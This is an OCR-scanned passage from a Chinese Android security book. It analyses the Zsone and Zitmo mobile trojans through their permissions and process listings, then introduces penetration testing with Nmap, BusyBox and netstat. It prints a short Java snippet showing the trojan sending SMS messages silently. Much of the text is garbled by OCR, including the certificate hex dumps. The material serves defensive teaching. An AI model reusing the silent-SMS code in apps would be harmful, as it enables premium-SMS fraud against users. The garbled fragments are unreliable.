权限 : android. permission. INTERNET , 该 权限 可 以 使 程序 同 外 部 网 络 建立 连接 。 


4.5.2 Zsone 手机 木马 程序 分 析 


接 下 来 ， 本 节 分 析 另 一 个 名 为 “Zsone” 的 手机 木马 程序 ， 该 木马 程序 使 用 了 
不 同 的 名 字 伪 装 自己 ， 如 iCalendar, iMateh 等 。Zsone 手机 木马 程序 出 现在 2011 年 
夏季 ， 它 能 够 不 经 用 户 允 许 发 送 SMS 信息 ， 同 DroidDream 木马 程序 一 样 Zsone F 
机 木马 程序 已 经 被 Google 公司 从 Android 应 用 市 场 删除 。 
从 隐藏 了 Zsone 木马 程序 的 日 历 应 用 程序 的 代码 分 析 中 可 见 ， 该 应 用 程序 请 求 
获取 下 列 权 限 : 
«item name-"android.permission.READ PHONE STATE" /> 
<item name-"android.permission.SET WALLPAPER" /> 
<item name-"android.permission.SEND SMS" /> 
<item name-"android.permission.WRITE  EXTERNAL STORAGE" /> 
«item name-"android.permission.INTERNET" /» 
<item name-"android.permission.RECEIVE SMS" /> 
«item name-"android.permission.ACCESS  COARSE LOCATION" /» 
«item name-"android.permission.RESTART PACKAGES" /» 
如 图 4.13 所 示 ， 该 应 用 程序 请 求 的 这 些 权 限 没 有 一 个 与 作为 一 款 日 历 应 用 程 
序 应 有 的 功能 相关 。 基 本 上 ， 所 有 的 这 些 权限 赋予 的 功能 ， 如 接收 和 发 送 SMS 信 
息 、 提 供 基于 手机 蜂 窗 移动 DD 或 Wi-Fi 的 位 置信 息 ， 以 及 读 取 电话 状态 等 功能 ， 
都 表明 该 应 用 程序 是 一 款 恶 意 软件 。 下 面 的 代码 段 说 明了 该 应 用 程序 无 需 用 户 介 
入 ， 即 可 发 送 SMS 信息 的 功能 。 
SmsManager smgr = SmsManager.getDefault(); 
String destNum = "5553342234"; 
String smsString = "Your phone has been Pwnd”; 
smgr.sendTextMessage(destNum,null,smsString,null,null); 


4.5.3 Zitmo 手机 木马 程序 分 析 


如 今 ， 大 多 数 主 流 银 行 都 推出 了 手机 银行 服务 软件 。 起 初 ， 这 些 软件 仅 使 用 单 
一 认证 方式 ， 即 通过 用 户 名 和 密码 验证 用 户 身 份 ， 并 且 人 允许 用 户 登 录 手 机 银行 网 
站 ， 查 看 金融 信息 。 后 来 由 于 这 类 形式 的 认证 方式 很 容易 被 攻破 ， 如 通过 密码 破 
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«package name-"com.mj.iCalendar" codePath-"/data/app/com.mj.iCalendar-1,apk" nativelibraryPaths"/data/data/com.mj . 


flags-"0" fte"132adfdf7d8" it-"132adfdfa58" ut-"132adfdfa58" version="2" userId-"10036"» 


«sigs coum 


iCalendar/lib" 


> 
«cert index=" key= "308202153082017ea00302010202044d259ebc300d06092a864886f70d0101050500304e310b3009060355040613023836310b300906 
0355040813025348310b300906035504071302434e310b3009060355040013024d4a310b3009060355040b13024d41310b3009060355040313024d4a3020170d3 
131303130363130353134305a180f323131303132313331303531343050304e310b3009060355040613023836310b3009060355040813025348310b3009060355 
94071302434e310b3009060355040a13024d4a310b3009060355040b13024d4a3100300906035504031302444a30819f 300006092a864886f 7000101010500038 
1840030818902818100991e665610b37aaaf dda7174dc42de9c9326c7 c6c2be3b7b76d9dbfd75ce&adaaSc45f e1b2a1a5d10e9aa00076a8893e9bf94 f074a14d1e 
85f003efc128c2608fb7c2381693a7d7f6b9086a91f53b3e8f27a047df06721d37556771c85c738ce65c5571c513eac6d7 f490d6d07 fa3ef0b2 7db10e8Ad6f0d1 
d683880e717e6f25902030100013004d060922864886f 70201010505000381810071bf29e93a8cca279cd03222ef 3932698a086a54cBaac785f c7e36e72c4d776f 
68e64a217b97be3adec6febf38dfc2d6a23dc92a23f59d20df4ae76177e316d60d89dd8dd25b3e4c6c054f858e1371e9d3b764426e6e1b3060475ca71051f5bad 


8815cc2869ccd12811dfed49ef30458461c84d8afeac94aecdóffG6a631ada6d" /> 
«/sigs» 

«perms» 

«item names"android.permission.READ PHONE STATE" /> 

«item names"android.permission,SET WALLPAPER" /> 

«item names"android.permission.SEND SMS" /» 

«item names"android.permission,WRITE EXTERNAL STORAGE" /» 


«item name-"android.permission.ACCESS, COARSE. LOCATION" /> 
«item names"android.permission.RESTART PACKAGES" /> 
«/perms» 

«/package» 








图 4. 13 ”恶意 软件 Zsone 请 求 的 权限 @ 





解 、MITM (Man In The Middle， 中 间 人 ) 攻击 2 和 社会 工程 学 等 方式 ， 银 行 已 经 开 


始 采 用 双重 认证 方式 。 除 了 需要 用 户 的 账号 和 密码 外 ， 还 需要 在 登录 时 向 用 户 手 机 





发 送 一 条 内 容 为 5 ~6 位 数字 的 一 次 性 PIN 码 短信 
从 而 确定 登录 用 户 的 身份 。 

Android 系统 上 的 Zitmo 木马 程序 能 够 通过 拦截 
银行 发 送 给 用 户 手机 的 验证 码 短信 攻破 上 述 双 重 认 
证 机 制 。2010 年 9 月 ， 这 种 蠕虫 病毒 在 诺基亚 的 
Symbian 系统 上 第 一 次 被 发 现 。 现 在 ， 它 已 经 开始 感 
X Android 操作 系统 。 基 本 上 ，Zeus 木马 工具 包 主 要 
依靠 木马 程序 作案 ， 当 用 户 浏览 含有 Zeus 木马 的 恶 
意 网 站 时 ， 系 统 会 受到 Zeus 木马 感染 ， 自 动 安装 
Zeus 木马 工具 包 。Zeus KATRE REKE E 
取 认 证 证 书 ， 该 证 书 是 双重 认证 过 程 的 第 一 层 。 之 
后 ， 安 装 的 Zitmo 手机 木马 程序 拦截 并 窃取 银行 发 送 
给 用 户 的 交易 授权 验证 码 (Transaction Authentication 














& 

















， 作 为 完整 认证 过 程 


的 一 部 分 ， 


0000-0000-0000-000 





图 4.14 Android 系统 上 
的 Zitmo 恶意 软件 


Number, TAN) 短信 ， 并 将 其 提供 给 攻击 者 ， 从 而 攻破 双重 认证 过 程 的 第 二 层 。 








”通过 模拟 器 上 的 /data/system/packages. xml 文件 ， 查 看 Zsone 应 月 


© MITM (Man In The Middle, PEJA) 攻击 是 一 种 “间接 ” 














恶意 软件 把 自己 伪装 成 名 为 “Trusteer Rapport". 的 应 用 程序 ， 如 图 4. 14 所 示 。 


日 请 求 的 权限 信息 。 一 一 原 书 注 





的 入 侵 攻击 ， 这 种 攻击 模式 是 通过 各 种 技 








术 手 段 将 受 入侵 者 控制 的 一 台 计 算 机 虚拟 放置 在 网 络 连 接 中 的 两 台 通信 计算 机 之 间 ， 














称 为 “中 间 人 ”。 简 言 之 ， 所 谓 的 MITM 攻击 就 是 通过 拦截 正常 的 网 络 通 信 数 据 ， 并 进行 数据 算 改 和 

















嗅 探 ， 而 通信 的 双方 却 毫 不 知情 。 目 前 ，MITM 攻击 已 经 成 为 对 网 银 、 网 游 、 网 上 交易 








且 最 具 破 坏 性 的 一 种 攻击 方式 。 一 一 译 者 注 





这 台 计 算 机 就 








等 最 有 威胁 并 
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它 以 “com. systemsecurity6. gms” 的 应 用 程序 包 名 取得 用 户 信任 ， 安 装 在 设备 上 。 
对 于 一 般 用 户 来 说 ， 很 难 将 该 包 名 的 应 用 程序 识别 成 恶意 软件 。 

在 模拟 器 上 启动 的 shell FEF ERIT “p” MS, 将 显示 所 有 运行 进程 的 信息 ， 
如 图 4.15 所 示 。 从 图 中 可 见 ， 恶 意 软件 Zitmo 使 用 “com. systemsecurity6. gms” 的 
包 名 运行 在 系统 上 。 








root 23 Z 9 9 cO04b2c4 00000000 5 kstriped 
root 24 Z e 9 c004b2c4 00000000 5 hid compat 
root 25 2 9 9 c004b2c4 00000000 S rpciod/0 
root 26 2 0 9 c019d16c 00000000 S mmcqd 
root 27 1 248 152  c009b74c 0000875c S /sbin/ueventd 
system 28 1 804 276 | c01a94a4 afdüb6fc S /system/bin/servicemanager 
root 28 1 3864 592  ffffffff afdÜbdac S /system/bin/vold 
root 30 1 3836 560  Fffffffff afdÜbdac S /system/bin/netd 
root 31 1 664 264 — cOib52b4 afdOcOcc S /system/bin/debuggerd 
radio 32 i 5396 700  ffffffff afdObdac S /system/bin/rild 
root 33 1 74072 27136 c009b74c afd0b844 S zygote 
media 34 i 17996 3768 ffffffff afdüb6fc S /system/bin/mediaserver 
root 35 I 812 344  c02181f4 afdOb45c S /system/bin/installd 
keystore 36 1 1744 432  c01b52b4 afdOcOcc S /system/bin/keystore 
root 38 1 824 340 — cOO0b8fec afdOc5ic S /system/bin/gemud 
shell 40 1 732 312  c0158eb0 afdðb45c S /system/bin/sh 

1 


S 

$ 

S 

S 

S 

S 

$ 

S 

S 

S 

S 

S 

$ 

S 

M 

S 

root 41 3368 172 ffffffff 00008294 S /sbin/adbd 

system 61 33 136736 40448 ffffffff afdüb6fc S system server 

app.4 116 33 86108 22800 ffffffff afdOcSic S jp.co.omronsoft.openwnn 

radio 129 33 99176 24460 ffffffff afdécSic S com.android.phone 

system 123 33 86620 25880 ffffffff afdüc5ic S com.android.systemui 

app.i3 142 33 95416 32232 ffffffff afdðc51c S com.android.launcher 

system 159 33 86660 21400 ffffffff afdüc5ic S com.android.settings 

app.6 180 33 93752 26352 ffffffff afdüc5ic S android.process.acore 

app.19 189 33 84312 21352 ffffffff afdücS5ic S com.android.deskclock 

app. 24 201 33 82976 19968 ffffffff afdüc5ic S com.android.protips 

app.5 214 33 83528 20456 ffffffff afdüc5ic S com.android.music 

app.2 225 33 84012 20960 ffffffff afdOc5ic S com.android.quicksearchbox 

app.9 233 33 86488 22432 ffffffff afdOc5ic S android.process.media 

app. 15 244 33 95608 21728 ffffffff afdüc5ic S com.android.mms 

app.28 266 33 85976 22892 ffffffff afdüc5ic S com.android.email 

app.3 347 33 83940 20084 ffffffff afdücSic S com.android.defcontainer 

app. 9 358 33 82896 19632 ffffffff afdüc5ic S com.svox.pico 
5 
S 
R 


root 400 41 732 348  c003da38 afdðc3ac 5 /system/bin/sh 

app_38 402 33 83212 20696 ffffffff afdüc5ic S com.systemsecurity6.gms 
root 410 400 888 324 . 00000000 afdOb45c R ps 

zd 


4.15 ps 命令 输出 显示 (可见 Zitmo 正在 运行 ) 


如 图 4. 16 所 示 ， 恶 意 软件 Zitmo 请 求 的 权限 如 下 : 
«item name-"android.permission.READ PHONE STATE" /> 
«item name-"android.permission.INTERNET" /» 
<item name-"android.permission.RECEIVE SMS" /> 


READ PHONE STATE 权限 使 应 用 程序 可 以 获得 IMEI SS, SIM 码 ， 以 及 其 他 
唯一 标识 手机 的 数据 。RECEIVE_SMS 权限 使 其 能 够 拦截 银行 网 站 发 送 的 交易 授权 
验证 码 ， 一 旦 窃取 交易 授权 验证 码 ， 该 恶意 软件 即使 用 INTERNET 权限 将 其 发 送 
给 远程 命令 与 控制 (Command and Control, C&C) 中 心 。 
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«package name-"com.systemsecurity6.gms" codePaths"/data/app/com.systemsecurity6.gms-1.apk" nativelibraryPathe"/data/data/com.systems 
ecurity6.gms/lib" flags="0" ft-"132flce1b28" it-"132flcelfS7" ut-"132ficelfS7" versione"1" userId-"10038"» 

«sigs Count= "1 "> 

«cent index-"6" keys"3082010730820110000302010202044d628406300d060920864886f700010105050030183116301406035504001304d54727573746565722 
04c74642e30161704d3131303532393137333930325a170433363035323231373339303250301831163014060355040013005472757374656572204c74642e30819f3 
00d06092a864886f704010101050003818d003081890281810006cc322a2156db391e1147a718714d935367faf3ecc4ef 320a2aeb6cBc7042ece64f6e38216e8b29c2 
4ddfce65addee7752952e774026dafBdfefadüc7ebO6ddbcSb4a5fa2fd1028fb95983db306deef6cb76396698c0730b45d0644811469153784f3112452492e520434 
f35b3bd099b841c2b684f56c6218e301d0b7f4ab99302030100013004060920864886f70d01010505000381810098a4d90cf062 fü6a0aebbef85041519648101e6f9 
Cb386c8547966864f0e99b387b3456a3a9800f d49b0f6a2440dccae9b58cf058d7505d3944877b6db48d507 cd6a1eb85880f92133760083a061766eda0e12e38e42* 
&95eeeb93c52423723494d8635c1a38dcf9d4160a8f22eaca33e8f f 37e663278abb799bd900c738130466" /> 

«/sigs- 

«perms» 

«item name«"android.permission.READ PHONE STATE" /> 

«item names"android.permission.INTERNET" /> 

«item name-"android.permission.RECEIVE SMS" /> 

«/perms» 

e/nncianes 


图 4.16 Zitmo 权限 


4.6 人 小结 


本 章 介 绍 了 Android 安全 模型 的 内 核 屋 和 应 用 层 ， 通 过 本 章 的 学 习 ， 读 者 应 该 
能 够 理解 Android 系统 如 何 使 用 Linux 内 核 运行 基于 权限 的 安全 模型 。 其 次 ， 本 章 
还 介绍 了 Manifest 权限 ， 并 从 安全 性 意义 的 角度 ， 论 证 了 Manifest 权限 对 Android 
应 用 程序 的 重要 性 。 再 次 ， 本 章 曾 述 了 移动 设备 的 安全 格局 ， 包 括 搭载 Android f 
作 系 统 平台 的 移动 设备 。 最 后 ， 本 章 分 析 了 几 款 恶意 软件 ， 演 示 了 如 何 基于 请 求 权 
限 对 应 用 程序 进行 安全 分 析 的 方法 。 





第 $ 音 Android 渗透 测试 


本 章 主 要 关注 Android 系统 平台 和 应 用 程序 的 渗透 测试 。 首 先 从 介绍 渗透 方 
法 、 讨 论 如 何 获得 Android 操作 系统 细节 信息 入手 ， 然 后 对 Android 应 用 程序 进行 
渗透 测试 ， 继 而 讨论 Android 应 用 程序 的 安全 问题 。 在 本 章 结束 前 ， 讨 论 几 个 相对 
较 新 的 问题 (如 云 存储 等 ) 和 系统 修补 问题 。 最 后 ， 展 示 几 个 近期 出 现 的 Android 
应 用 程序 安全 问题 。 
通过 前 面 几 章 的 介绍 ， 读 者 应 该 对 Android 系统 的 体系 结构 (第 2 章 介绍 的 内 
容 ) Android 应 用 程序 基础 知识 ( 如 构成 组 件 、 框 架 等 ,第 3 章 介 绍 的 内 容 ) ， 以 
及 Android 权限 和 安全 模型 (第 4 章 介绍 的 内 容 ) 比较 熟悉 了 。 














5.1 渗透 测试 








渗透 测试 (Penetration Test) ， 也 可 称 为 pen 测试 ， 是 一 种 通过 模拟 内 部 和 外 部 
攻击 ， 评 佑 系统 安全 性 的 方法 ， 目 的 是 在 恶意 攻击 者 发 现 问题 之 前 找到 并 修复 这 些 
问题 。 一 般 在 应 用 软件 发 布 之 前 进行 测试 ， 用 于 确保 软件 的 安全 性 ， 或 是 在 应 用 软 
件 发 布 之 后 ， 通 过 测试 确保 软件 没有 漏洞 存在 。 源 码 审查 或 项 态 分 析 可 以 有 效 地 辅 
助 渗透 测试 。 理 想 情 况 下 ， 静 态 分 析 应 当 是 软件 开发 生命 周期 (Software Develop- 
ment Life Cycle, SDLC) 的 一 部 分 ， 需 要 在 渗透 测试 之 前 进行 。 如 果 在 渗透 测试 之 
前 进行 静态 分 析 ， 就 可 以 在 软件 产品 开发 完毕 之 前 纠正 发 现 的 问题 ， 从 而 相对 减少 
渗透 测试 过 程 中 发 现 的 问题 。 这 样 ， 如 果 客 户 需 要 渗透 测试 报告 的 话 ， 就 能 够 提供 
相对 简洁 的 渗透 测试 报告 ， 从 而 为 测试 产品 提供 安全 担保 。 

根据 展开 模拟 测试 的 位 置 ， 可 将 渗透 测试 分 为 两 类 : 内 部 测试 和 外 部 测试 。 接 
下 来 的 内 容 主 要 对 内 部 和 外 部 渗透 测试 、 进 行 渗透 测试 的 教程 、 静 态 分 析 ， 以 及 对 
Android 操作 系统 和 设备 实施 渗透 测试 的 步骤 进行 概述 。 


5.1.1. 外 部 渗透 测试 


外 部 渗透 测试 主要 是 由 安全 测试 人 员 在 网 络 外 部 对 系统 进行 的 测试 ， 测试 人 员 
仅 被 提供 有 限 的 信息 。 企 业 网 络 由 众多 防火 墙 保护 ， 这 些 防火 墙 具 有 ACL (Access 
Control List， 网 络 控制 列表 ) 功能 ， 能 够 阻止 大 多 数 端口 被 从 外 部 访问 。 在 外 部 渗透 
测试 中 ， 提 供给 安全 测试 人 员 的 信息 只 有 URL 和 IP 地 址 。 并 且 执 行 外 部 渗透 测试 
时 ， 测 试 人 员 使 用 的 很 多 工具 或 技术 将 遭 到 防火 墙 的 阻拦 ， 通 党 是 阻止 它们 对 内 部 
网 络 的 探测 ， 从 而 阻止 这 些 存在 但 被 防火 墙 或 其 他 防御 系统 保护 的 漏洞 被 发 现 。 
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例如 ， 经 过 root 处 理 的 Android 设备 在 850 端口 运行 一 个 服务 。 通 常 将 防火 墙 
配置 为 禁止 该 端口 被 探测 ， 以 保护 在 该 端口 上 运行 的 服务 。 这 样 ， 外 部 的 渗透 测试 
就 无 法 检测 到 在 该 端口 上 运行 的 服务 。 然 而 ， 如 果 经 过 root 处 理 的 Android 设备 在 
80 端口 运行 httpd 服务 器 ， 则 借助 外 部 渗透 测试 ,很 有 可 能 发 现在 SO 端口 上 运行 
的 httpd 服务 ， 因 为 防火 墙 允许 80 端口 被 外 部 网 络 访问 。 


5.1.2 内 部 渗透 测试 


防火 墙 无 法 阻止 内 部 渗透 测试 (如 果 存 在 分 层 体系 结构 的 网 络 防火 墙 布局 ， 
或 许可 以 对 内 部 渗透 测试 有 些 屏蔽 作用 ) 。 因 此 ， 对 于 内 部 渗透 测试 来 说 ， 获 取 内 
部 系统 (例如 ， 拥 有 私有 P 地 址 的 系统 等 ) 的 信息 相对 比较 容易 。 

继续 以 root 处 理 过 的 Android 设备 为 例 ， 仍 然 在 该 设备 的 850 端口 上 运行 某 一 
服务 。 由 于 防火 墙 可 能 不 会 阻止 内 部 渗透 测试 ， 因 此 对 于 安全 测试 人 员 来 说 ， 通 过 
内 部 渗透 测试 很 有 可 能 发 现 该 端口 及 在 其 上 运行 的 服务 。 从 而 ， 当 该 服务 正 同 其 他 
设备 进行 通信 时 ， 即 可 探测 到 该 过 程 。 

根据 以 往 的 经 验 ， 同 外 部 渗透 测试 相 比 ， 内 部 渗透 测试 能 够 发 现 更 多 的 问题 。 
外 部 渗透 测试 基于 这 样 一 个 事实 ， 外 部 攻击 者 无 法 访问 网 络 内 部 设备 。 然 而 ， 这 并 
` 意 味 着 内 部 渗透 测试 发 现 的 问题 就 不 重要 ， 业 内 人 士 同 样 能 够 利用 这 些 问题 。 而 
且 ， 外 部 攻击 者 很 可 能 利用 这 些 问 题 发 起 更 大 范围 的 攻击 ， 并 将 这 些 攻击 作为 这 一 
大 范围 攻击 的 一 部 分 。 从 这 个 意义 上 来 说 ， 实 际 上 ， 攻 击 者 就 已 经 处 于 网 络 的 内 
部 了 。 


5.1.3 渗透 测试 方法 


同行 评审 方法 可 以 指导 渗透 测试 执行 的 过 程 。NIST 800-115 和 OSSTMM 就 是 
这 样 的 两 类 指导 性 的 文档 。 在 进行 渗透 测试 时 ， 不 需要 严格 遵照 其 中 所 述 的 每 一 个 
步 又 ， 只 需 把 它们 作为 指导 性 的 原则 ， 并 根据 具体 需求 加 以 修改 ， 实 施 测试 。 

典型 的 渗透 测试 大 致 可 以 分 为 以 下 四 个 阶段 : 

1) 规划 : 确定 实施 目标 ， 获 取 批 准 和 支持 。 

2) 发 现 : 获取 目标 信息 ， 包 括 IP 地 址 、 联 系 人 信息 、 系 统 信息 ( 如 操作 系 
统 版 本 ) 、 应 用 程序 ， 以 及 数据 库 信 息 等 。 

3) 攻击 : 基于 阶段 2 得 到 的 信息 ， 确 定 所 有 存在 漏洞 的 系统 、 应 用 程序 以 及 
数据 库 ， 利 用 这 些 漏洞 。 必 要 的 话 ， 返 回 阶段 2， 再 次 实施 发 现 过 程 。 

4) 报告 : 根据 评估 ， 将 发 现 的 问题 按照 严重 性 等 级 进行 分 类 : 致命 风险 、 高 
风险 、 中 等 风险 以 及 低 风 险 。 同 时 ， 将 得 出 的 分 析 和 建议 报告 提供 给 管理 者 。 


5.1.4 静态 分 析 
静态 分 析 不 属于 渗透 测试 ， 但 是 对 于 安全 测试 人 员 来 说 ， 静 态 分 析 是 一 个 重要 
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的 工具 。 它 可 以 帮助 安全 测试 人 员 早 在 软件 开发 生命 周期 中 ， 就 能 够 发 现 软件 代码 
方面 存在 的 问题 ， 当 然 如 果 软 件 已 经 发 布 ， 也 可 使 用 静态 分 析 在 软件 安全 评 佑 后 
期 ， 发 现代 码 中 存在 的 相关 问题 。 静 态 分析 工 具 针 对 程序 代码 库 展开 分 析 ， 借 助 相 
关 代 码 分 析 算 法 ， 分 析 不 同 的 代码 路 径 和 流程 ， 并 且 提 供 一 个 潜在 的 安全 问题 清 
单 。 在 静态 分 析 中 ， 常 常会 出 现 一 定 比 例 的 误 报 。 完 美的 静态 分 析 用 法 在 于 程序 开 
发 人 员 无 需 外 部 帮助 ， 仪 靠 使 用 静态 分 析 理 解 / 改 进 自 己 编写 的 代码 ， 防 止 以 后 可 
能 出 现 的 代码 问题 。 

对 于 Android 系统 而 言 ， 本 书 主要 分 析 两 个 层次 的 安全 性 问题 : 操作 系统 和 应 
用 程序 (本 书 不 考虑 硬件 层 ， 有 关 硬 件 层 的 安全 问题 可 参考 其 他 书籍 ) 。 


5.1.5 Android 系统 和 设备 渗透 测试 步骤 


对 于 身边 大 多 数 的 Android 设备 来 说 ， 一 个 主要 的 问题 就 是 ， 该 设备 是 否 经 过 
root 处 理 。root 处 理 过 的 设备 可 能 面临 更 多 的 安全 风险 ， 因 为 用 户 能 够 以 提升 的 权 
限 运行 应 用 程序 ， 并 且 攻 击 者 也 能 够 利用 提升 的 权限 损害 Android 设备 。 同 时 ， 分 
析 Android 操作 系统 软件 栈 自身 存在 的 问题 ， 对 于 确保 Android 系统 安全 性 也 是 很 
有 帮助 的 ， 尽 管 这 需要 查看 内 核 源码 和 各 种 系统 支持 库 等 内 容 的 源码 。 此 外 ， 对 于 
安全 测试 人 员 来 说 ,组 合 使 用 黑白 盒 测 试 通常 也 是 一 种 非常 好 的 安全 测试 方法 ， 这 
可 以 使 测试 人 员 在 访问 网 络 上 设备 的 过 程 中 ， 当 感到 设备 上 存在 可 疑 活 动 时 ， 能 够 
立即 进行 进一步 的 深入 探测 。 

1) 获取 Android 设备 的 IP 地 址 。 

2) 运行 NMAP 吕 进行 扫描 ， 查 看 目标 设备 上 运行 的 服务 。 

3) 对 可 疑 设备 (如 经 过 root 处 理 的 设备 ) ， 使 用 Wireshark 获取 并 分 析 数 据 包 。 

4) 如 果 认 为 设备 被 入侵 ， 使 用 诸如 BusyBox 工具 探查 设备 内 部 运行 状况 (如 
哪些 进程 正在 运行 等 ) ， 同 时 进行 鉴别 。 

5) 对 操作 系统 和 各 种 支持 库 的 源 代码 执行 静态 分 析 。 尤 其 是 查看 各 个 设备 厂商 提 
供 的 代码 ， 如 HTC 等 。 代 码 审查 主要 关注 以 下 几 种 类 型 的 问题 : 资源 泄露 、 空 指针 引 
用 、 非 法 访问 操作 ， 以 及 程序 执行 流程 等 问题 ， 从 而 找 出 那些 绕 过 安全 检查 的 问题 。 

6) 审查 配置 文件 和 代码 是 否 使 用 明文 存储 密码 和 其 他 的 敏感 数据 ， 而 没有 采 

取 适 当 安 全 考虑 。 












































5.2 Android 渗透 测试 工具 


虽然 Android 系统 在 设计 上 自 带 了 一 个 精简 的 shell 程序 ,但 是 当 安 全 测试 人 员 























”NMAP， 网 络 安全 扫描 器 是 一 款 开放 源 代码 的 网 络 探 测 和 安全 审核 的 工具 。 它 的 设计 目标 是 快速 地 扫 
描 大 型 网 络 ， 当 然 用 它 扫描 单个 主机 也 没有 问题 。 译 者 注 
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需要 访问 更 多 信息 时 ， 该 shell 程序 无 法 满足 安全 测试 人 员 的 需求 。 对 于 这 一 问题 ， 
| 0 的 几 种 工具 来 解决 ， 例 如 Nmap: 网 络 扫描 需 、Wireshark : 
网 络 嗅 探 器 ， 以 及 BusyBox: 命令 行 (如 可 执行 “ifconfig” 命 令 ) 集成 工具 。 对 于 
测试 人 员 来 说 ，BusyBox 是 这 几 个 工具 中 最 常用 的 。 


5.2.1 Nmap 


如 果 没 有 访问 设备 本 身 ， 只 是 查看 存在 Android 设备 的 网 络 ， 此 时 ， 可 以 使 用 
Nmap 扫描 器 。Nmap 扫描 器 能 够 对 指定 的 TP 地 址 启动 同步 扫描 (SYN) ， 查 找 操作 


系统 指纹 让 





只 别 信息 和 版 本 检测 信息 ， 如 图 5. 1 所 示 ， 该 扫描 结果 显示 没有 打开 的 端 











口 〈 或 在 端口 上 运行 的 服务 ) ， 因 此 无 法 提供 有 关 该 Android 设备 的 有 用 信息 。 不 
过 ,一旦 存在 打开 的 端口 ， 就 可 以 对 该 端口 实施 进一步 的 探测 。 





@ı Anmol — bash — 80x24 m 


— Nmap 5.51€ http: :.//nmap . org ) at 2011-12-24 13:34 PST 

Warning: Unable to open interface vmnetl -- skipping it. 

Warning: Unable to open interface vmnet8 -- skipping it. 

Note: Host seems down. If it is really up, but blocking our ping probes, try -Pn 
Nmap done: 1 IP address (0 hosts up) scanned in 3.79 seconds 

anmmisra-mac:- Anmol$ sudo nmap -sS -A 192.168.0.104 


Starting Nmap 5.51 ( http://nmap.org ) at 2011-12-24 13:34 PST 

Warning: Unable to open interface vmnetl -- skipping it. 

Warning: Unable to open interface vmnet8 -- skipping it. 

Nmap scan report for android 3474f00bc85957bc (192.168.0.104) 

Host is up (0.016s latency). 

All 1000 scanned ports on android 3474f00bc85957bc (192.168.0.104) are closed 
Too many fingerprints match this host to give specific OS details 

Network Distance: 1 hop 


TRACEROUTE (using port 1025/tcp) 


HOP RTT 


ADDRESS 


1 3.06 ms android. 3474f00bc85957bc (192.168.0.104) 


OS and Service detection performed. Please report any incorrect results at http: 
//nmap.org/submit/ . 
Nmap done: 1 IP address (1 host up) scanned in 4.93 seconds 


图 5.1 对 Android 设备 执行 Nmap 同步 扫描 


S.2.2 BusyBox 


虽然 Android 系统 自 带 了 一 个 精简 的 Shell 工具 程序 ， 但 是 BusyBox 工具 能 够 为 
Android 系统 提供 UNIX 系统 工具 集中 很 多 常用 的 工具 ， 从 而 使 得 在 Android 设备 上 





进行 了 解 、 








查看 、 渗 透 测试 以 及 取证 鉴别 等 操作 更 加 便捷 方便 。 不 过 ， 由 于 


是 在 Android 系统 上 运行 ,不 是 所 用 的 功能 选项 都 能 被 支持 , 例如， 那些 
能 在 桌面 版 本 系统 上 才能 运行 的 命令 或 选项 。 
下 面 是 在 模拟 器 上 安装 并 运行 BusyBox 工具 过 程 的 说 明 ， 如 图 5.2 所 示 。 对 于 
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— Android 设备 ， 需 要 经 过 root 处 理 ， 才 能 安装 BusyBox 应 用 程序 包 ， 从 而 使 其 


成 功 运行 。 





已 有 BusyBox 





首先 ， 从 Linux 系统 上 的 终端 控制 台 启 动 adb shell, WT FEMS (假设 手边 


的 二 进 制 可 执行 安 厂 文件 ) : 
adb shell mkdir /data/busybox 
adb shell push busybox /data/busybox 
adb shell 
chmod 755 /data/busybox 
/data/busybox -install 


pentestusrietools-gibbons-vm-2:-$ adb shell 
# cd /data/busybox 
* ./ifconfig 


ethe@ 


Link encap:Ethernet HWaddr 52:54:00:12:34:56 

inet addr:10.0.2.15 Bcast:10.0.2.255 Mask:255.255.255.0 
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1 

RX packets:340 errors:9 dropped:@ overruns:0 frame:e 

TX packets:336 errors:@ dropped:9 overruns:O carrier:9 
collisions:80 txqueuelen:10900 

RX bytes:24268 (23.6 KiB) TX bytes:22374 (21.8 KiB) 
Interrupt:13 Base address:0xcO000 DMA chan:ff 


Link encap:Local Loopback 

inet addr:127.0.0.1 Mask:255.0.0.0 

UP LOOPBACK RUNNING MTU:16436 Metric:l 

RX packets:0 errors:@ dropped:0 overruns:O frame: 
TX packets:0 errors:@ dropped:O overruns:@ carrienr:9 
collisions:90 txqueuelen:9 

RX bytes:O (0.0 B) TX bytes:O (0.0 B) 





图 5.2 BusyBox 安装 后 执行 ifconfig 命令 








这 时 ， 这 些 命令 工具 应 该 已 经 安装 在 /data/busybox 日 录 下 了 ， 更 改 该 日 录 的 


路 径 或 更 新 系统 


如 图 5.2 所 示 ， 从 执行 “ifconfig 


“10.0. 2.15”, 








环境 变量 











， 就 能 直接 使 用 这 些 常 用 的 UNIX 命令 了 。 
”命令 的 输出 结果 可 见 ， 该 模拟 器 的 IP 地 址 为 
这 是 一 个 专用 于 模拟 器 的 保留 地 址 。 如 果 设 备 连接 在 网 络 上 ， 那 么 这 












































个 IP 地址 可 能 形 如 “192. 168. 0. 104” 的 样子 。IP 地 址 “10. 0. 2.2” 是 用 户 工 作 机 系 
统 〈 例 如， 运行 模拟 器 的 工作 机 系统 ) 上 本 地 回环 地 址 “127.0.0.1” 的 别名 。 
“10. 0.2.1” 是 路 由 器 /网 关 的 地 址 , “10. 0.2.3” 是 首 个 DNS 服务 器 的 地 址 。 


如 图 5.3 











和 图 5.4 所 示 ， 从 这 个 截图 上 可 以 看 到 ，80 端口 是 开启 的 ,设备 上 





的 httpd 服务 程序 运行 在 该 端口 。 在 一 个 典型 的 Android 设备 上 ， 需 要 对 该 端口 做 
进一步 的 探测 o 


5.2.3 Wireshark 
要 想 分 析 Android 设备 产生 的 数据 包 ， 可 以 有 两 种 方式 : 一 种 是 需要 对 Android 
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pentestusri&etools-gibbons-vm-2:-$ adb shell 
* cd /data/busybox 
# ./netstat -an 
Active Internet connections (servers and established) 
Proto Recv-Q Send-Q Local Address Foreign Address State 

0 0 127.0.0.1:5037 0.90.0.0:* LISTEN 

0 8 0.0.0.0:5555 9.0.0.0:* LISTEN 

e 79 10.0.2.15:5555 10.0.2.2:57335 ESTABLISHED 
netstat: no support for 'AF INET6 (tcp)' on this system 
netstat: no support for 'AF INET6 (udp)' on this system 
netstat: no support for 'AF INET6 (raw)' on this system 
Active UNIX domain sockets (servers and established) 
Proto RefCnt Flags Type State I-Node Path 
unix 2 [ ACC ] STREAM LISTENING 258 /dev/socket/property se 
rvice 
unix 
unix 
unix 
unix 
unix 
unix 
unix 
unix 
unix 


STREAM LISTENING 277 /dev/socket/vold 
STREAM LISTENING 284 /dev/socket/netd 
STREAM LISTENING 322 &jdwp-control 

STREAM LISTENING 291 /dev/socket/rild-debug 
